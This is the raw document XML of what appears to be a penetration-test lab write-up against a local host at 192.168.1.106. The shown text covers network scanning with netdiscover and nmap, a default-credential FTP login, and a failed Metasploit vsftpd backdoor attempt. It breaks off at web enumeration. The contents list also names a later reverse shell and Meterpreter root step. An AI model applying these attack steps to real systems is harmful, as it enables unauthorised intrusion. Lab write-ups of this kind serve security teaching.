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32CE17" w14:textId="2DB1B057" w:rsidR="00C133D6" w:rsidRDefault="00C133D6">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5781C7C8" wp14:editId="4603A9DF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>-80645</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1645984</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7853082" cy="11098794"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7853082" cy="11098794"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4305EB" w14:textId="36A33193" w:rsidR="00C133D6" w:rsidRDefault="00C133D6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74FF2F" w14:textId="016867F1" w:rsidR="00C133D6" w:rsidRDefault="00C133D6">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F45EE3B" wp14:editId="1D68276C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>-550652</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7772165" cy="10984433"/>
            <wp:effectExtent l="0" t="0" r="635" b="762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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7772165" cy="10984433"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CFA18" w14:textId="311157F7" w:rsidR="00C133D6" w:rsidRDefault="00C133D6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>1  Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.1  Network Discovery and Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.2  FTP Service Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.3  Web Application Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.4  Development Server and API Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.5  Web Server Scanning and Credential Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.6  Authenticated Area and Uploader Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>2  Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    2.1  File Upload Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    2.2  Request Manipulation and File Path Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    2.3  Reverse Shell Trigger and Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    2.4  User Level Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>3  Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.1  Local Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="403"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.2  Meterpreter Payload and Root Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>4  Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>1  Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA33E6" w14:textId="5559EFD0" w:rsidR="0034780F" w:rsidRDefault="0087134C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087134C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="72"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ENUMERATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BFF641" w14:textId="3298F47F" w:rsidR="0087134C" w:rsidRDefault="0087134C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Firstly, to attack any target, we must first go through the steps of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, enumeration and scanning to recognize and identify possible vulnerability of a system. We can identify the network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> address by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -I eth0: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E87CD6" w14:textId="3F630B40" w:rsidR="0087134C" w:rsidRDefault="0087134C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087134C">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A7271D4" wp14:editId="68848805">
            <wp:extent cx="5943600" cy="14160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416050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.1  Network Discovery and Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8901E" w14:textId="19626689" w:rsidR="0087134C" w:rsidRDefault="0087134C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We have identified the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> address </w:t>
      </w:r>
      <w:r w:rsidRPr="0087134C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>192.168.1.106</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> run a complete </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan on this IP with version and port scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F044306" w14:textId="18BAF15B" w:rsidR="0087134C" w:rsidRDefault="0087134C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0087134C">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3574E1FA" wp14:editId="46D94864">
            <wp:extent cx="5381728" cy="430135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383913" cy="4303104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E3ED72" w14:textId="6D695313" w:rsidR="0087134C" w:rsidRDefault="0087134C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We have identified several ports that are open; port 21 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, port 80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> there is a possible </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry point in one of this ports.</w:t>
      </w:r>
      <w:r w:rsidR="000046CF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> It also tells us anonymous login allowed. Nmap is telling us FTP service is using default username and password, we can start by exploiting the FTP service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4F8FC" w14:textId="5FFE28DD" w:rsidR="000046CF" w:rsidRDefault="00D56D58" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56D58">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D0E8C4C" wp14:editId="6229285B">
            <wp:extent cx="3858163" cy="2772162"/>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58163" cy="2772162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.2  FTP Service Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34727F27" w14:textId="567926E9" w:rsidR="00D56D58" w:rsidRDefault="00D56D58" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After using default </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56D58">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> username and password I am able to login successfully, however when I try to find any files and look for available directories, there was zero results.</w:t>
      </w:r>
      <w:r w:rsidR="002847BB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> But there is a clue here, we can use. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002847BB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002847BB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.5 backdoor is an out dated one and we can exploit and try gaining root access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D6963C" w14:textId="6C9BF605" w:rsidR="002847BB" w:rsidRDefault="002847BB" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We are using Metasploit for this. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A1CAC" w14:textId="034F8620" w:rsidR="002847BB" w:rsidRDefault="00CA0EF7" w:rsidP="0087134C">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&gt;search exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor&gt;set LHOST&gt; set RHOSTS&gt; exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD922FD" w14:textId="55374CBD" w:rsidR="00CA0EF7" w:rsidRDefault="00CA0EF7" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA0EF7">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D8BCB58" wp14:editId="29E51A86">
            <wp:extent cx="5943600" cy="19043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904365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4587C221" w14:textId="39BC6C4D" w:rsidR="00CA0EF7" w:rsidRDefault="00CA0EF7" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Unfortunately we couldn’t access the backdoor and exploit couldn’t open a shell session. So we are skipping this. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.3  Web Application Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C939EEA" w14:textId="5A294C17" w:rsidR="003F3E10" w:rsidRDefault="00C55C9B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Since port 80 was found open we can check ways to exploit that. Lets first view the webpage and past the target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D58E38C" w14:textId="7BFC2D61" w:rsidR="00C55C9B" w:rsidRDefault="00C55C9B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55C9B">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47C54ED6" wp14:editId="02AB2D79">
            <wp:extent cx="5943600" cy="47218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721860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465EBD0" w14:textId="375CECE4" w:rsidR="00C55C9B" w:rsidRDefault="00C55C9B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
